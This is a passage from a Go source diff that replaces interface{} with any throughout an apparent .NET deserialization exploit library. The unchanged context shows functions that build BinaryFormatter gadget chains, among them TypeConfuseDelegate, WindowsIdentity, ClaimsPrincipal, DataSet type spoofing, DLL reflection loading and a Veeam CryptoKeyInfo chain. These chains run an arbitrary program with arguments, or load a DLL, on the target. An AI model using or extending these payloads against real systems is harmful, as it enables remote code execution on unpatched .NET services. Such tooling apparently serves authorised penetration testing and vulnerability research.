 				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
@@ -413,7 +413,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    18,
 			MemberCount: 7,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			MemberReferenceRecord{IDRef: 4},
 			ObjectNullRecord{},
 			MemberReferenceRecord{IDRef: 40},
@@ -429,7 +429,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID19 := ClassWithIDRecord{
 		ObjectID:   19,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 41,
 				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
@@ -446,7 +446,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    20,
 			MemberCount: 7,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			MemberReferenceRecord{IDRef: 5},
 			ObjectNullRecord{},
 			MemberReferenceRecord{IDRef: 44},
@@ -462,7 +462,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID21 := ClassWithIDRecord{
 		ObjectID:   21,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 45,
 				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
@@ -479,7 +479,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    22,
 			MemberCount: 7,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			MemberReferenceRecord{IDRef: 6},
 			MemberReferenceRecord{IDRef: 48},
 			MemberReferenceRecord{IDRef: 49},
@@ -495,7 +495,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID23 := ClassWithIDRecord{
 		ObjectID:   23,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 0x32,
 				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
@@ -512,7 +512,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    24,
 			MemberCount: 7,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			MemberReferenceRecord{IDRef: 7},
 			ObjectNullRecord{},
 			MemberReferenceRecord{IDRef: 53},
@@ -528,7 +528,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID25 := ClassWithIDRecord{
 		ObjectID:   25,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 54,
 				Value:    "System.Web.UI.WebControls.PagedDataSource",
@@ -548,7 +548,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    26,
 			MemberCount: 7,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			MemberReferenceRecord{IDRef: 8},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(10)},
@@ -564,7 +564,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID27 := ClassWithIDRecord{
 		ObjectID:   27,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 57,
 				Value:    "System.ComponentModel.Design.DesignerVerb",
@@ -584,7 +584,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    28,
 			MemberCount: 5,
 		},
-		Members: []interface{}{ // interface{} can be replaced by any
+		Members: []any{ // any can be replaced by any
 			ObjectNullMultiple256Record{NullCount: 2},
 			MemberReferenceRecord{IDRef: 59},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(3)},
@@ -592,7 +592,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ClassWithIDRecord{
 				ObjectID:   29,
 				MetadataID: 15,
-				MemberValues: []interface{}{
+				MemberValues: []any{
 					BinaryObjectRecord{
 						ObjectID: 61,
 						Value:    "System.Runtime.Remoting.Channels.AggregateDictionary",
@@ -614,7 +614,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    30,
 			MemberCount: 1,
 		},
-		Members: []interface{}{
+		Members: []any{
 			MemberReferenceRecord{IDRef: 9},
 		},
 	}
@@ -626,7 +626,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    31,
 			MemberCount: 2,
 		},
-		Members: []interface{}{
+		Members: []any{
 			MemberReferenceRecord{IDRef: 10},
 			MemberReferenceRecord{IDRef: 10},
 		},
@@ -639,7 +639,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    32,
 			MemberCount: 2,
 		},
-		Members: []interface{}{
+		Members: []any{
 			BinaryObjectRecord{ObjectID: 65, Value: ""},
 			MemberReferenceRecord{IDRef: 65},
 		},
@@ -648,7 +648,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 
 	// SCWMT O36
 	ID36MemberNames := []string{"Delegate", "method0"}
-	ID36MemberTypeInfo, ok := getMemberTypeInfo([]string{"SystemClass", "SystemClass"}, ID36MemberNames, []interface{}{
+	ID36MemberTypeInfo, ok := getMemberTypeInfo([]string{"SystemClass", "SystemClass"}, ID36MemberNames, []any{
 		"System.DelegateSerializationHolder+DelegateEntry",
 		"System.Reflection.MemberInfoSerializationHolder",
 	})
@@ -664,7 +664,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID36MemberNames,
 		},
 		MemberTypeInfo: ID36MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 66},
 			MemberReferenceRecord{IDRef: 67},
 		},
@@ -675,7 +675,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID40 := ClassWithIDRecord{
 		ObjectID:   40,
 		MetadataID: 36,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 68},
 			MemberReferenceRecord{IDRef: 69},
 		},
@@ -686,7 +686,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID44 := ClassWithIDRecord{
 		ObjectID:   44,
 		MetadataID: 36,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 70},
 			MemberReferenceRecord{IDRef: 71},
 		},
@@ -697,7 +697,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID48 := ClassWithIDRecord{
 		ObjectID:   48,
 		MetadataID: 36,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 72},
 			MemberReferenceRecord{IDRef: 73},
 		},
@@ -708,7 +708,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID49 := ClassWithIDRecord{
 		ObjectID:   49,
 		MetadataID: 36,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 74},
 			MemberReferenceRecord{IDRef: 75},
 		},
@@ -719,7 +719,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID53 := ClassWithIDRecord{
 		ObjectID:   53,
 		MetadataID: 36,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 76},
 			MemberReferenceRecord{IDRef: 77},
 		},
@@ -730,7 +730,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID59 := ClassWithIDRecord{
 		ObjectID:   59,
 		MetadataID: 4,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 78},
 			MemberReferenceRecord{IDRef: 79},
 		},
@@ -739,7 +739,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 
 	// SCWMT O66
 	ID66MemberNames := []string{"type", "assembly", "target", "targetTypeAssembly", "targetTypeName", "methodName", "delegateEntry"}
-	ID66MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "Object", "String", "String", "String", "SystemClass"}, ID66MemberNames, []interface{}{
+	ID66MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "Object", "String", "String", "String", "SystemClass"}, ID66MemberNames, []any{
 		"System.DelegateSerializationHolder+DelegateEntry",
 	})
 
@@ -754,7 +754,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID66MemberNames,
 		},
 		MemberTypeInfo: ID66MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 62},
 			ObjectNullRecord{},
@@ -768,7 +768,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 
 	// SCWMT O67
 	ID67MemberNames := []string{"Name", "AssemblyName", "ClassName", "Signature", "Signature2", "MemberType", "GenericArguments"}
-	ID67MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "String", "String", "String", "Primitive", "SystemClass"}, ID67MemberNames, []interface{}{
+	ID67MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "String", "String", "String", "Primitive", "SystemClass"}, ID67MemberNames, []any{
 		PrimitiveTypeEnum["Int32"],
 		"System.Type[]",
 	})
@@ -785,7 +785,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID67MemberNames,
 		},
 		MemberTypeInfo: ID67MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 83},
 			MemberReferenceRecord{IDRef: 62},
 			MemberReferenceRecord{IDRef: 82},
@@ -801,7 +801,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID68 := ClassWithIDRecord{
 		ObjectID:   68,
 		MetadataID: 66,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 62},
 			ObjectNullRecord{},
@@ -817,7 +817,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID69 := ClassWithIDRecord{
 		ObjectID:   69,
 		MetadataID: 67,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 91},
 			MemberReferenceRecord{IDRef: 62},
 			MemberReferenceRecord{IDRef: 82},
@@ -833,7 +833,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID70 := ClassWithIDRecord{
 		ObjectID:   70,
 		MetadataID: 66,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 62},
 			ObjectNullRecord{},
@@ -849,7 +849,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID71 := ClassWithIDRecord{
 		ObjectID:   0x47,
 		MetadataID: 0x43,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 0x63},
 			MemberReferenceRecord{IDRef: 0x3e},
 			MemberReferenceRecord{IDRef: 0x62},
@@ -865,7 +865,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID72 := ClassWithIDRecord{
 		ObjectID:   0x48,
 		MetadataID: 0x42,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 0x3e},
 			ObjectNullRecord{},
@@ -881,7 +881,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID73 := ClassWithIDRecord{
 		ObjectID:   0x49,
 		MetadataID: 0x43,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 0x6b},
 			MemberReferenceRecord{IDRef: 0x3e},
 			MemberReferenceRecord{IDRef: 0x6a},
@@ -897,7 +897,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID74 := ClassWithIDRecord{
 		ObjectID:   0x4a,
 		MetadataID: 0x42,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 0x3e},
 			ObjectNullRecord{},
@@ -913,7 +913,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID75 := ClassWithIDRecord{
 		ObjectID:   0x4b,
 		MetadataID: 0x43,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 0x73},
 			MemberReferenceRecord{IDRef: 0x3e},
 			MemberReferenceRecord{IDRef: 0x72},
@@ -929,7 +929,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID80 := ClassWithIDRecord{
 		ObjectID:   0x4c,
 		MetadataID: 0x42,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			MemberReferenceRecord{IDRef: 0x3e},
 			ObjectNullRecord{},
@@ -945,7 +945,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID81 := ClassWithIDRecord{
 		ObjectID:   0x4d,
 		MetadataID: 0x43,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 0x7b},
 			MemberReferenceRecord{IDRef: 0x3e},
 			MemberReferenceRecord{IDRef: 0x7a},
@@ -961,7 +961,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID82 := ClassWithIDRecord{
 		ObjectID:   0x4e,
 		MetadataID: 0xf,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"},
 			4,
 			MemberReferenceRecord{IDRef: 0x3a},
@@ -975,7 +975,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    0x4f,
 			MemberCount: 2,
 		},
-		Members: []interface{}{
+		Members: []any{
 			MemberReferenceRecord{IDRef: 0x82},
 			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(8192)},
 		},
@@ -984,7 +984,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 
 	// SCWMT O130
 	ID130MemberNames := []string{"_a", "_b", "_c", "_d", "_e", "_f", "_g", "_h", "_i", "_j", "_k"}
-	ID130MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive"}, ID130MemberNames, []interface{}{
+	ID130MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive"}, ID130MemberNames, []any{
 		PrimitiveTypeEnum["Int32"],
 		PrimitiveTypeEnum["Int16"],
 		PrimitiveTypeEnum["Int16"],
@@ -1009,7 +1009,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID130MemberNames,
 		},
 		MemberTypeInfo: ID130MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			PrimitiveInt32(1959924499),
 			PrimitiveInt16(10990),
 			PrimitiveInt16(4561),
@@ -1093,8 +1093,8 @@ func CreateDataSetXMLDiffGram(payloadIn string) (string, bool) {
 	binaryLibrary := BinaryLibraryRecord{ID: libraryID, Library: "System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	className := "System.Data.DataSet"
 	memberNames := []string{"XmlSchema", "XmlDiffGram"}
-	var memberValues []interface{}
-	var additionalInfo []interface{}
+	var memberValues []any
+	var additionalInfo []any
 	memberTypes := []string{
 		"String",
 		"String",
@@ -1143,7 +1143,7 @@ func CreateTextFormattingRunProperties(program string, args string, formatter st
 	serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1}
 	binaryObject := BinaryObjectRecord{ObjectID: 3, Value: xmlData}
 
-	var memberValues []interface{}
+	var memberValues []any
 	memberValues = append(memberValues, binaryObject)
 	classWithMembersAndTypes := ClassWithMembersAndTypesRecord{ClassInfo: classInfo, LibraryID: libraryID, MemberTypeInfo: memberTypeInfo, MemberValues: memberValues, BinaryLibrary: binaryLibrary}
 	classWithMembersAndTypesString, ok := classWithMembersAndTypes.ToRecordBin()
@@ -1184,10 +1184,10 @@ func CreateDataSet(program string, args string, formatter string) (string, bool)
 	binaryLibrary := BinaryLibraryRecord{ID: libraryID, Library: "System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 
 	// MemberNames, then Types, then additional infos (for types that require it) all correspond to the memberValues
-	var memberValues []interface{}
-	var additionalInfo []interface{}
-	var innerMemberValues []interface{}
-	var innerMemberTypeInfoAdditionalInfos []interface{}
+	var memberValues []any
+	var additionalInfo []any
+	var innerMemberValues []any
+	var innerMemberTypeInfoAdditionalInfos []any
 
 	// start creating OUTER classWithMembersAndTypes
 	// start with arrays
@@ -1357,9 +1357,9 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	/////// object8
 	obj8MemberNames := []string{"type", "assembly", "target", "targetTypeAssembly", "targetTypeName", "methodName", "delegateEntry"}
 	obj8MemberTypes := []string{"String", "String", "Object", "String", "String", "String", "SystemClass"}
-	var obj8additionalInfo []interface{}
+	var obj8additionalInfo []any
 	obj8additionalInfo = append(obj8additionalInfo, "System.DelegateSerializationHolder+DelegateEntry")
-	var obj8MemberValues []interface{}
+	var obj8MemberValues []any
 	obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 11, Value: fmt.Sprintf("System.Func`3[[%s],[%s],[%s]]", mscorlibSystemString, mscorlibSystemString, systemlibSystemDiagString)})
 	obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 12, Value: mscorlibString})
 	obj8MemberValues = append(obj8MemberValues, ObjectNullRecord{})
@@ -1388,10 +1388,10 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	/////// object9
 	obj9MemberNames := []string{"Name", "AssemblyName", "ClassName", "Signature", "Signature2", "MemberType", "GenericArguments"}
 	obj9MemberTypes := []string{"String", "String", "String", "String", "String", "Primitive", "SystemClass"}
-	var obj9additionalInfo []interface{}
+	var obj9additionalInfo []any
 	obj9additionalInfo = append(obj9additionalInfo, PrimitiveTypeEnum["Int32"])
 	obj9additionalInfo = append(obj9additionalInfo, "System.Type[]")
-	var obj9MemberValues []interface{}
+	var obj9MemberValues []any
 	obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 15})
 	obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 13})
 	obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 14})
@@ -1417,8 +1417,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	}
 
 	/// obj1 class
-	var obj1AdditionalInfo []interface{}
-	var obj1MemberValues []interface{}
+	var obj1AdditionalInfo []any
+	var obj1MemberValues []any
 	obj1MemberNames := []string{"Count", "Comparer", "Version", "Items"}
 	obj1MemberTypes := []string{"Primitive", "SystemClass", "Primitive", "StringArray"}
 	obj1MemberValues = append(obj1MemberValues, 2)
@@ -1449,8 +1449,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	}
 
 	/// obj3 class
-	var obj3AdditionalInfo []interface{}
-	var obj3MemberValues []interface{}
+	var obj3AdditionalInfo []any
+	var obj3MemberValues []any
 	obj3MemberNames := []string{"_comparison"}
 	obj3MemberTypes := []string{"SystemClass"}
 
@@ -1476,7 +1476,7 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	}
 
 	// Create arraySinglePrimitiveRecord to append before the end
-	var arraySingleStringMembers []interface{}
+	var arraySingleStringMembers []any
 	arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 6, Value: args})
 	arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 7, Value: program})
 	arraySingleStringRecord := ArraySingleStringRecord{
@@ -1485,8 +1485,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	}
 
 	/// obj5 class
-	var obj5AdditionalInfo []interface{}
-	var obj5MemberValues []interface{}
+	var obj5AdditionalInfo []any
+	var obj5MemberValues []any
 	obj5MemberNames := []string{"Delegate", "method0", "method1"}
 	obj5MemberTypes := []string{"SystemClass", "SystemClass", "SystemClass"}
 
@@ -1516,7 +1516,7 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 	}
 
 	// classWIthID 1
-	var classWithIDOneMemberValues []interface{}
+	var classWithIDOneMemberValues []any
 	classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 22, Value: "Compare"})
 	classWithIDOneMemberValues = append(classWithIDOneMemberValues, MemberReferenceRecord{IDRef: 12})
 	classWithIDOneMemberValues = append(classWithIDOneMemberValues, BinaryObjectRecord{ObjectID: 24, Value: "System.String"})
@@ -1531,7 +1531,7 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s
 		MemberValues: classWithIDOneMemberValues,
 	}
 	// classWIthID 2
-	var classWithIDTwoMemberValues []interface{}
+	var classWithIDTwoMemberValues []any
 	classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, BinaryObjectRecord{ObjectID: 27, Value: fmt.Sprintf("System.Comparison`1[[%s]]", mscorlibSystemString)})
 	classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, MemberReferenceRecord{IDRef: 12})
 	classWithIDTwoMemberValues = append(classWithIDTwoMemberValues, ObjectNullRecord{})
@@ -1617,7 +1617,7 @@ func CreateWindowsIdentity(program string, args string, formatter string) (strin
 	base64.StdEncoding.Encode(b64String, []byte(innerTypeConfuseDelegate))
 	innerTypeConfuseDelegateBase64 := string(b64String)
 
-	var memberValues []interface{}
+	var memberValues []any
 	memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 2, Value: innerTypeConfuseDelegateBase64})
 
 	memberNames := []string{"System.Security.ClaimsIdentity.actor"}
@@ -1682,7 +1682,7 @@ func CreateClaimsPrincipal(program string, args string, formatter string) (strin
 	base64.StdEncoding.Encode(b64String, []byte(innerTypeConfuseDelegate))
 	innerTypeConfuseDelegateBase64 := string(b64String)
 
-	var memberValues []interface{}
+	var memberValues []any
 	memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5, Value: innerTypeConfuseDelegateBase64})
 
 	memberNames := []string{"m_serializedClaimsIdentities"}
@@ -1747,9 +1747,9 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri
 	className := "System.Data.DataSet, System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
 
 	// create INNER class
-	var innerMemberValues []interface{}
+	var innerMemberValues []any
 	innerMemberValues = append(innerMemberValues, 1)
-	var innerMemberTypeInfoAdditionalInfos []interface{}
+	var innerMemberTypeInfoAdditionalInfos []any
 	innerMemberTypeInfoAdditionalInfos = append(innerMemberTypeInfoAdditionalInfos, PrimitiveTypeEnum["Int32"])
 	innerMemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive"}, []string{"value__"}, innerMemberTypeInfoAdditionalInfos)
 	if !ok {
@@ -1769,7 +1769,7 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri
 	}
 
 	// Continue creating primary class
-	var memberValues []interface{}
+	var memberValues []any
 	memberValues = append(memberValues, innerClassWithMembersAndTypes)
 	memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5})
 	memberValues = append(memberValues, MemberReferenceRecord{IDRef: 5})
@@ -1793,7 +1793,7 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri
 		"DataSet.Tables_0",
 	}
 
-	var additionalInfo []interface{}
+	var additionalInfo []any
 	additionalInfo = append(additionalInfo, ClassTypeInfo{TypeName: "System.Data.SerializationFormat", LibraryID: 3})
 	additionalInfo = append(additionalInfo, PrimitiveTypeEnum["Boolean"])
 	additionalInfo = append(additionalInfo, PrimitiveTypeEnum["Int32"])
@@ -1905,7 +1905,7 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 		"RepairRecs",
 	}
 
-	var additionalInfo []interface{}
+	var additionalInfo []any
 	additionalInfo = append(additionalInfo, "System.Guid")
 	additionalInfo = append(additionalInfo, PrimitiveTypeEnum["Int32"])
 	additionalInfo = append(additionalInfo, PrimitiveTypeEnum["Int32"])
@@ -1919,8 +1919,8 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 		MemberNames: memberNames,
 	}
 	// INNER CLASS for value
-	var innerMemberValues []interface{}
-	var innerAdditionalInfo []interface{}
+	var innerMemberValues []any
+	var innerAdditionalInfo []any
 	innerMemberNames := []string{"_a", "_b", "_c", "_d", "_e", "_f", "_g", "_h", "_i", "_j", "_k"}
 	innerMemberTypes := []string{"Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive"}
 
@@ -1966,7 +1966,7 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 		MemberTypeInfo: innerMemberTypeInfo,
 	}
 
-	var memberValues []interface{}
+	var memberValues []any
